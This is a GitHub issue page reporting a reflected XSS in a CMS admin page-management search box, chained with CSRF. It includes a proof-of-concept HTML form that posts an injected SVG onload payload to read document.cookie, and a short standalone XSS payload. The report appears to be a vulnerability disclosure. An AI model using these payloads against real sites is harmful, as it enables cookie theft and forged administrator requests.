Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Reflective XSS exists in the administrator's page management office In the search box, enter "><a src=" to trigger XSS
Reuse CSRF vulnerability to obtain cookies
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/index.php?g=&m=admin_page&a=index" method="POST"> <input type="hidden" name="start_time" value="" /> <input type="hidden" name="end_time" value="" /> <input type="hidden" name="keyword" value=""><svg onload=alert(document.cookie)><a src="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
The text was updated successfully, but these errors were encountered:
"><svg onload=alert(1)><a src="
Sorry, something went wrong.
No branches or pull requests
Reflective XSS exists in the administrator's page management office
In the search box, enter "><a src=" to trigger XSS
Reuse CSRF vulnerability to obtain cookies
POC
The text was updated successfully, but these errors were encountered: